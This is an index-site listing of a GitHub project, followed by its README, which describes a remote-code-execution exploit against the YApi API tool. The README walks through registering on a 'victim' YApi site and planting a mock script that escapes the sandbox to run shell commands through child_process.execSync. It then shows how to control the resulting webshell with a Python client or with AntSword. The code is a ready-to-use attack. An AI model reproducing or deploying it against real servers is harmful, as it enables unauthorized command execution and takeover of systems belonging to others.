Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/esonhugh/yapi-rce-webshell

Yapi mock script RCE another version. Webshell way. 另一种 Webshell 方式的 Yapi 命令执行的方法相比于其他的利用方式更加微操和可控影响更小
https://github.com/esonhugh/yapi-rce-webshell

exp exploit mock mockjs rce webshell yapi

Last synced: 27 days ago
JSON representation

Yapi mock script RCE another version. Webshell way. 另一种 Webshell 方式的 Yapi 命令执行的方法相比于其他的利用方式更加微操和可控影响更小

Host: GitHub
URL: https://github.com/esonhugh/yapi-rce-webshell
Owner: Esonhugh
Created: 2022-05-13T18:17:33.000Z (over 2 years ago)
Default Branch: Skyworship
Last Pushed: 2024-07-04T05:28:58.000Z (7 months ago)
Last Synced: 2024-12-26T15:09:21.872Z (about 1 month ago)
Topics: exp, exploit, mock, mockjs, rce, webshell, yapi
Language: Python
Homepage:
Size: 8.79 KB
Stars: 65
Watchers: 2
Forks: 4
Open Issues: 1
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

        # yapi-rce-webshell

Yapi mock script RCE another version. Webshell way.

https://github.com/YMFE/yapi/issues/2099

# funny things 

usage:

1. victim yapi website

2. register account

3. craete project and create api in it

4. create mock script like 

```js

const sandbox = this

const ObjectConstructor = this.constructor

const FunctionConstructor = ObjectConstructor.constructor

const myfun = FunctionConstructor('return process')

const process = myfun()

mockJson = process.mainModule.require("child_process").execSync("cd "+cookie.dir+";"+cookie.cmd).toString()

// you can also add exec function to do some async jobs like running enum scripts

```

5.  use python script to connect webshell and interactive

```bash

python3 webshell.py {mock address like: http://whereisthevictim/mock/222/test/test } -i # interactive mode

# or

python3 webshell.py {mock address like: http://whereisthevictim/mock/222/test/test} {cmd dir,you can use "."} {command location}

```

# AntSword-like Alternative

1. Same as usage

2. But Create an API With Advanced Mock POST Method.

```js

const sandbox = this

const ObjectConstructor = this.constructor

const FunctionConstructor = ObjectConstructor.constructor

const myfun = FunctionConstructor('return process')

const process = myfun()

mockJson = process.mainModule.require("child_process").execSync(params.data).toString()

// you can also add exec function to do some async jobs like running enum scripts

```

3. Open AntSword

4. Create with Config like

- Type: CMDLINUX

- Pass: data

- URL: mock url in Yapi config

- encoder: default

- decoder: base64 

5. enjoy your webshell